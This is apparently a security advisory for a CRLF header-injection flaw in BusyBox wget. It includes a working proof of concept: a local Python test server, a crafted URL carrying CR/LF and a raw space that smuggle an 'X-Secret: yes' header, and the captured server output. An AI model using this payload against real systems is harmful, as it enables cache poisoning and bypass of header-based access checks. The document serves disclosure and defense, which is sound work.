Product: BusyBox (wget) Affected: through 1.37.0 File: networking/wget.c
CWE: 113
Summary: If the request-target (path/query) contains raw CR/LF/C0 or a raw space (0x20), the HTTP request line can be split and attacker-chosen headers injected, enabling cache poisoning / policy bypass.
Vector: A user or automated job fetches a crafted URL that includes CR/LF in the path/query (e.g., via link or redirect).
Mitigation: Reject CR/LF/C0 and raw 0x20 in the request-target; callers should percent-encode (%0D, %0A, %20).
from http.server import BaseHTTPRequestHandler, HTTPServer
class H(BaseHTTPRequestHandler):
def do_GET(self):
need = "X-Secret"
print(self.headers)
if self.headers.get(need) == "yes":
self.send_response(200); self.end_headers(); self.wfile.write(b"OK\n")
else:
self.send_response(403); self.end_headers(); self.wfile.write(b"NO\n")
HTTPServer(("127.0.0.1", 9000), H).serve_forever()$ python3 poc.py
$ unset http_proxy
$ export http_proxy=http://127.0.0.1:9000
$ BAD_URL=$'http://evil.example/reset?token= HTTP/1.1\r\nX-Secret: yes\r\na:'
$ ./busybox wget "$BAD_URL" -O -
Observed (server side):
X-Secret: yes
a: HTTP/1.1
Host: evil.example
User-Agent: Wget
Connection: close